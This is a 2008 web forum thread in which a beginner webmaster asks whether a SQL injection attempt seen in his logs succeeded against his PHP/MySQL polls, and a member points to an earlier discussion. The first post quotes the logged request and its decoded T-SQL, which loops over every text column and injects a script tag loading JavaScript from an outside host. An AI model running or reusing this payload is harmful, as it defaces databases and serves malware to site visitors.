homepage Welcome to WebmasterWorld Guest from
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member

Home / Forums Index / WebmasterWorld / New To Web Development
Forum Library, Charter, Moderators: brotherhood of lan & mack

New To Web Development Forum

SQL injection attempt (php/MySQL) help
Advice needed for cleaning up hacked website

5+ Year Member

Msg#: 3719893 posted 6:54 pm on Aug 10, 2008 (gmt 0)

I have a couple of very simple javascript polls on my site that use MySQL databases to count votes after the user selects an option using a radio button. Today, in our log, I noticed the following, which after researching, seems to be a SQL injection attempt similar to what has been going on lately:

"GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST
72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 6338 "-"

(note: I inserted page breaks so the code wouldn't stretch the page)

I translated it to this:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.example.com/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

I know nothing about php/MySQL other than what I've learned to get the polls working. I used the phpMyAdmin section my webhost provides to check the table structures in the database, and didn't find anything different. Clicking the polls brings up the results just like they should, with no redirects or any other apparent problem.

The SQL is:

SELECT * FROM `revolvepoll_results` WHERE 1

with two fields (candidate and num_votes).

I am wondering if someone can clarify for me whether there is anything else I need to do? I read through the thread in the Databases section but the discussion is too sophisticated for a novice like me.

Thank you for any help you can give.

BTW, I've lurked here a while but forgot the screen name I used to sign up, thus the new sign-up date.

[edited by: mack at 10:29 pm (utc) on Aug. 10, 2008]
[edit reason] removed site url from code just to be safe [/edit]



WebmasterWorld Senior Member rocknbil us a WebmasterWorld Top Contributor of All Time 10+ Year Member

Msg#: 3719893 posted 10:22 pm on Aug 10, 2008 (gmt 0)

Welcome aboard Norksie, have you seen this thread [webmasterworld.com]? Well discussed there.


5+ Year Member

Msg#: 3719893 posted 10:58 pm on Aug 10, 2008 (gmt 0)

Yes, thank you rocknbil, I did read that thread before I posted in this forum, but as I said, it is too sophisticated for my understanding. The responses presume a level of knowledge I don't have, which is why I came to this "newbie" forum hoping for some simplified advice.

Perhaps I can boil down my questions to the fundamentals:

1) If I was able to execute my poll javascript from the webpage where it is located, and nothing happened except the poll results output page was generated, can I be sure the attack failed?

2) If I look at the structure of my table with phpMyAdmin, and it shows nothing more than what I set up, can be I sure nothing was inserted into the table? In other words, would it be obvious if something was there?

I am not a programmer, only a casual webmaster, and I just want to be sure my visitors don't end up with something malicious. Thank you again to anyone who has any input.

Global Options:
 top home search open messages active posts  

Home / Forums Index / WebmasterWorld / New To Web Development
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved